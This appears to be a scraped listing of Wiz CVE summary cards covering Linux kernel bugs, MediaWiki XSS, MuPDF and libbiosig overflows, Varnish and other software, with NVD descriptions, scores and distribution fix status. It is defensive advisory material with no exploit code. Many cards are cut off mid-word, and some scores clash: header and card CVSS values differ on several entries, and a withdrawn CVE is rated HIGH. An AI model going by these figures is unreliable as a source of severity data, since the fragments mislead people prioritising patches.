roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Feb 10, 2026
Echo Severity MEDIUM Has Fix Added at: Feb 10, 2026
Ubuntu 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No Fix Added at: Mar 10, 202
Wiz
CVE-2022-50857 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50857 [MEDIUM] CVE-2022-50857 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50857 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rapidio: rio: fix possible name leak in rio_register_mport()
If device_register() returns error, the name allocated by dev_set_name()
need be freed. It should use put_device() to give up the reference in the
error path, so that the name can be freed in kobject_cleanup(), and
list_del() is called to delete the port from rio_mports.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and librarie
Wiz
CVE-2025-6590 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2025-6590 [MEDIUM] CVE-2025-6590 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6590 :
Linux Debian vulnerability analysis and mitigation
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/htmlform/fields/HTMLUserTextField.Php.
This issue affects MediaWiki: from * through 1.39.12, 1.42.76 1.43.1, 1.44.0.
Source : NVD
## 4.6
Score
Published February 2, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Has Fix Added at: Jul 03, 2025
Debian 14 Has F
Wiz
CVE-2026-23325 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23325 [MEDIUM] CVE-2026-23325 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23325 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: Fix possible oob access in mt7996_mac_write_txwi_80211()
Check frame length before accessing the mgmt fields in
mt7996_mac_write_txwi_80211 in order to avoid a possible oob access.
Source : NVD
## 7.1
Score
Published March 25, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-6.8
linux-gcp-6.14
Sources
NVD
Debian 13 No Fix Added at: Mar 26, 2026
Debian 14 Has F
Wiz
CVE-2018-25222 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2018-25222 [HIGH] CVE-2018-25222 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2018-25222 :
Linux Debian vulnerability analysis and mitigation
SC v7.16 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying oversized input that exceeds buffer boundaries. Attackers can craft malicious input strings exceeding 1052 bytes to overwrite the instruction pointer and execute shellcode in the application context.
Source : NVD
## 8.6
Score
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sc
Sources
NVD
Debian 11, 12, 13, 14 Severity L
Wiz
CVE-2025-40334 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-40334 [MEDIUM] CVE-2025-40334 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40334 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: validate userq buffer virtual address and size
It needs to validate the userq object virtual address to
determine whether it is residented in a valid vm mapping.
Source : NVD
## 5.1
Score
Published December 9, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-xilinx
linux-gcp-5.4
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Dec 09, 2025
Debian 14 Has Fix Added at: Dec
Wiz
CVE-2026-23554 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23554 [HIGH] CVE-2026-23554 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23554 :
Linux Debian vulnerability analysis and mitigation
The Intel EPT paging code uses an optimization to defer flushing of any cached
EPT state until the p2m lock is dropped, so that multiple modifications done
under the same locked region only issue a single flush.
Freeing of paging structures however is not deferred until the flushing is
done, and can result in freed pages transiently being present in cached state.
Such stale entries can point to memory ranges not owned by the guest, thus
allowing access to unintended memory regions.
Source : NVD
## 7.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Ex
Wiz
CVE-2025-61656 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-61656 [MEDIUM] CVE-2025-61656 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61656 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation VisualEditor. This vulnerability is associated with program files src/ce/ve.Ce.ClipboardHandler.Js.
This issue affects VisualEditor: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Oct 05, 2025
Echo Has Fix
Wiz
CVE-2026-28295 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-28295 [MEDIUM] CVE-2026-28295 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28295 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in the FTP GVfs backend. A malicious FTP server can exploit this vulnerability by providing an arbitrary IP address and port in its passive mode (PASV) response. The client unconditionally trusts this information and attempts to connect to the specified endpoint, allowing the malicious server to probe for open ports accessible from the client's network.
Source : NVD
## 4.3
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected packages and libra
Wiz
CVE-2021-47853 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2021-47853 [MEDIUM] CVE-2021-47853 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2021-47853 :
Echo vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
## 8.6
Score
Published January 21, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
phppgadmin
Sources
NVD
Echo Severity HIGH No Fix Added at: Jan 23, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Echo vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
Wiz
CVE-2026-1764 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-1764 [MEDIUM] CVE-2026-1764 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1764 :
Linux Debian vulnerability analysis and mitigation
[Heap Buffer Overflow in GNOME localsearch MP3 Extractor]
Source : NVD
Published February 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
localsearch-debuginfo
localsearch-debugsource
Sources
NVD
Debian 11 No Fix Added at: Feb 04, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Feb 04, 2026
Debian 14 Has Fix Added at: Feb 04, 2026
Echo No Fix Added at: Feb 04, 2026
Red Hat 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 04, 2026
Ubuntu 18.04, 20.04 Severity MEDIUM No
Wiz
CVE-2025-6596 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-6596 [MEDIUM] CVE-2025-6596 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6596 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Vector. This vulnerability is associated with program files resources/skins.Vector.Js/portlets.Js, resources/skins.Vector.Legacy.Js/portlets.Js.
This issue affects Vector: from >= 1.40.0 before 1.42.7, 1.43.2, 1.44.0.
Source : NVD
Published February 2, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13 Has Fix Added at:
Wiz
CVE-2026-2903 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2903 [MEDIUM] CVE-2026-2903 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2903 :
Linux Debian vulnerability analysis and mitigation
A flaw has been found in skvadrik re2c up to 4.4. Impacted is the function check_and_merge_special_rules of the file src/parse/ast.cc. This manipulation causes null pointer dereference. The attack can only be executed locally. The exploit has been published and may be used. Patch name: febeb977936f9519a25d9fbd10ff8256358cdb97. It is suggested to install a patch to address this issue.
Source : NVD
## 4.8
Score
Published February 22, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected pack
Wiz
CVE-2026-23378 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23378 [HIGH] CVE-2026-23378 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23378 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_ife: Fix metalist update behavior
Whenever an ife action replace changes the metalist, instead of
replacing the old data on the metalist, the current ife code is appending
the new metadata. Aside from being innapropriate behavior, this may lead
to an unbounded addition of metadata to the metalist which might cause an
out of bounds error when running the encode op:
[ 138.423369][ C1] ==================================================================
[ 138.424317][ C1] BUG: KASAN: slab-out-of-bounds in ife_tlv_meta_encode (net/ife/ife.c:168)
[ 138.424906][ C1] Write of size 4 at addr ffff8880077f4ffe by task ife_out_out_bou/255
[ 138.4
Wiz
CVE-2025-64098 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2025-64098 [LOW] CVE-2025-64098 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64098 :
Linux Debian vulnerability analysis and mitigation
PID_IDENTITY_TOKEN
PID_PERMISSIONS_TOKEN
vecsize
readOctetVector
std::vector ::resize
Source : NVD
## 1.7
Score
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Nov 19, 2025
Echo Severity MEDIUM No Fix Added at: Nov 19, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
##
Wiz
CVE-2026-23337 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23337 [MEDIUM] CVE-2026-23337 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23337 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
pinctrl: pinconf-generic: Fix memory leak in pinconf_generic_parse_dt_config()
In pinconf_generic_parse_dt_config(), if parse_dt_cfg() fails, it returns
directly. This bypasses the cleanup logic and results in a memory leak of
the cfg buffer.
Fix this by jumping to the out label on failure, ensuring kfree(cfg) is
called before returning.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
Wiz
CVE-2026-3308 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-3308 [HIGH] CVE-2026-3308 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3308 :
Linux Debian vulnerability analysis and mitigation
An integer overflow vulnerability in 'pdf-image.c' in Artifex's MuPDF version 1.27.0 allows an attacker to maliciously craft a PDF that can trigger an integer overflow within the 'pdf_load_image_imp' function. This allows a heap out-of-bounds write that could be exploited for arbitrary code execution.
Source : NVD
## 7.8
Score
Published March 31, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mupdf
Sources
NVD
Debian 11, 12, 13, 14 Severity HIGH No Fix Added at: Apr
Wiz
CVE-2026-27472 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-27472 [MEDIUM] CVE-2026-27472 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27472 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.9 allows Blind Server-Side Request Forgery (SSRF) via syndicated sites in the private area. When editing a syndicated site, the application does not verify that the syndication URL is a valid remote URL, allowing an authenticated attacker to make the server issue requests to arbitrary internal or external destinations. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
## 5.3
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.6
Exploitation Probability (EPSS) 0.1
Affec
Wiz
CVE-2026-23429 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23429 [MEDIUM] CVE-2026-23429 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23429 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
iommu/sva: Fix crash in iommu_sva_unbind_device()
domain->mm->iommu_mm can be freed by iommu_domain_free():
iommu_domain_free()
mmdrop()
__mmdrop()
mm_pasid_drop()
After iommu_domain_free() returns, accessing domain->mm->iommu_mm may
dereference a freed mm structure, leading to a crash.
Fix this by moving the code that accesses domain->mm->iommu_mm to before
the call to iommu_domain_free().
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation
Wiz
CVE-2026-21876 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-21876 [CRITICAL] CVE-2026-21876 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21876 :
Linux Debian vulnerability analysis and mitigation
MULTIPART_PART_HEADERS
TX:0
TX:1
Source : NVD
## 5.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 9.3
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
modsecurity-crs
mod_security_crs
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Jan 11, 2026
Echo Severity MEDIUM Has Fix Added at: Jan 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux
Wiz
CVE-2025-68262 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68262 CVE-2025-68262 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68262 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
crypto: zstd - fix double-free in per-CPU stream cleanup
The crypto/zstd module has a double-free bug that occurs when multiple
tfms are allocated and freed.
The issue happens because zstd_streams (per-CPU contexts) are freed in
zstd_exit() during every tfm destruction, rather than being managed at
the module level. When multiple tfms exist, each tfm exit attempts to
free the same shared per-CPU streams, resulting in a double-free.
This leads to a stack trace similar to:
BUG: Bad page state in process kworker/u16:1 pfn:106fd93
page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x106fd93
flags: 0x17ffffc0000000(node=0|zone=2|lastcp
Wiz
CVE-2026-23012 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23012 [HIGH] CVE-2026-23012 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23012 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mm/damon/core: remove call_control in inactive contexts
If damon_call() is executed against a DAMON context that is not running,
the function returns error while keeping the damon_call_control object
linked to the context's call_controls list. Let's suppose the object is
deallocated after the damon_call(), and yet another damon_call() is
executed against the same context. The function tries to add the new
damon_call_control object to the call_controls list, which still has the
pointer to the previous damon_call_control object, which is deallocated.
As a result, use-after-free happens.
This can actually be triggered using the DAMON sysfs interface.
Wiz
CVE-2022-50741 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50741 [MEDIUM] CVE-2022-50741 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50741 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: imx-jpeg: Disable useless interrupt to avoid kernel panic
There is a hardware bug that the interrupt STMBUF_HALF may be triggered
after or when disable interrupt.
It may led to unexpected kernel panic.
And interrupt STMBUF_HALF and STMBUF_RTND have no other effect.
So disable them and the unused interrupts.
meanwhile clear the interrupt status when disable interrupt.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probabilit
Wiz
CVE-2025-14935 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-14935 [HIGH] CVE-2025-14935 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14935 :
Linux Debian vulnerability analysis and mitigation
NSF Unidata NetCDF-C Dimension Name Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of dimension names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27168.
Source : NVD
## 7.8
Score
Published Decembe
Wiz
CVE-2026-24028 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-24028 [MEDIUM] CVE-2026-24028 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24028 :
Linux Debian vulnerability analysis and mitigation
An attacker might be able to trigger an out-of-bounds read by sending a crafted DNS response packet, when custom Lua code uses newDNSPacketOverlay to parse DNS packets. The out-of-bounds read might trigger a crash, leading to a denial of service, or access unrelated memory, leading to potential information disclosure.
Source : NVD
## 5.3
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM N
Wiz
CVE-2025-68738 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68738 [MEDIUM] CVE-2025-68738 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68738 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: fix null pointer deref in mt7996_conf_tx()
If a link does not have an assigned channel yet, mt7996_vif_link returns
NULL. We still need to store the updated queue settings in that case, and
apply them later.
Move the location of the queue params to within struct mt7996_vif_link.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-6.17
linux-azure-nvi
Wiz
CVE-2025-71187 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71187 [MEDIUM] CVE-2025-71187 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71187 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: sh: rz-dmac: fix device leak on probe failure
Make sure to drop the reference taken when looking up the ICU device
during probe also on probe failures (e.g. probe deferral).
Source : NVD
## 5.5
Score
Published January 31, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fips
linux-fips
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Jan 31, 2026
Ubuntu 16.0
Wiz
CVE-2026-20777 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-20777 [HIGH] CVE-2026-20777 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-20777 :
Linux Debian vulnerability analysis and mitigation
A heap-based buffer overflow vulnerability exists in the Nicolet WFT parsing functionality of The Biosig Project libbiosig 3.9.2 and Master Branch (db9a9a63). A specially crafted .wft file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
## 8.1
Score
Published March 3, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 03,
Wiz
CVE-2025-68196 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68196 [MEDIUM] CVE-2025-68196 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68196 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Cache streams targeting link when performing LT automation
[WHY]
Last LT automation update can cause crash by referencing current_state and
calling into dc_update_planes_and_stream which may clobber current_state.
[HOW]
Cache relevant stream pointers and iterate through them instead of relying
on the current_state.
Source : NVD
## 8.8
Score
Published December 16, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/
Wiz
CVE-2026-23416 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23416 [MEDIUM] CVE-2026-23416 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23416 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mm/mseal: update VMA end correctly on merge
Previously we stored the end of the current VMA in curr_end, and then upon
iterating to the next VMA updated curr_start to curr_end to advance to the
next VMA.
However, this doesn't take into account the fact that a VMA might be
updated due to a merge by vma_modify_flags(), which can result in curr_end
being stale and thus, upon setting curr_start to curr_end, ending up with
an incorrect curr_start on the next iteration.
Resolve the issue by setting curr_end to vma->vm_end unconditionally to
ensure this value remains updated should this occur.
While we're here, eliminate this entire class of bug by simp
Wiz
CVE-2025-66044 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-66044 [CRITICAL] CVE-2025-66044 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66044 :
Linux Debian vulnerability analysis and mitigation
Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 64
Source : NVD
## 9.8
Score
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12, 2
Wiz
CVE-2026-34475 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-34475 [MEDIUM] CVE-2026-34475 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34475 :
Linux Debian vulnerability analysis and mitigation
Varnish Cache before 8.0.1 and Varnish Enterprise before 6.0.16r12, in certain unchecked req.url scenarios, mishandle URLs with a path of / for HTTP/1.1, potentially leading to cache poisoning or authentication bypass.
Source : NVD
## 5.4
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
varnish:6::varnish-devel
varnish-docs
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fi
Wiz
CVE-2025-40356 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-40356 CVE-2025-40356 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40356 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
spi: rockchip-sfc: Fix DMA-API usage
Use DMA-API dma_map_single() call for getting the DMA address of the
transfer buffer instead of hacking with virt_to_phys().
This fixes the following DMA-API debug warning:
------------[ cut here ]------------
DMA-API: rockchip-sfc fe300000.spi: device driver tries to sync DMA memory it has not allocated [device address=0x000000000cf70000] [size=288 bytes]
WARNING: kernel/dma/debug.c:1106 at check_sync+0x1d8/0x690, CPU#2: systemd-udevd/151
Modules linked in: ...
Hardware name: Hardkernel ODROID-M1 (DT)
pstate: 604000c9 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : check_sync+0x1d8/0x690
lr : check_sync+0x1
Wiz
CVE-2025-68755 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68755 [MEDIUM] CVE-2025-68755 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68755 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
staging: most: remove broken i2c driver
